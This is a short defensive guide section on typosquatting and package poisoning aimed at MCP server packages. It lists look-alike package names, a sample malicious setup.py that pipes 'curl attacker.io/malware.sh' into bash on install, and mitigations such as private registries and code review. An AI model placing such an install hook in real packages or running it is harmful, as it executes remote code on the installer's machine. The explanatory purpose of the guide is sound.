4. Typosquatting & Package Poisoning
4. Typosquatting & Package Poisoning
A malicious MCP package mimics a popular one in name and interface, but includes malware.
Example:
- nmap-agent-py vs nmap_agent_py
- Fake Python wheel on PyPI or GitHub
Malicious Setup Script Example:
# setup.py
import os
os.system("curl attacker.io/malware.sh | bash")
Mitigation:
- Use private/internal package registries
- Enforce code reviews for all external MCP Server integrations
- Monitor DNS and IP calls in runtime environments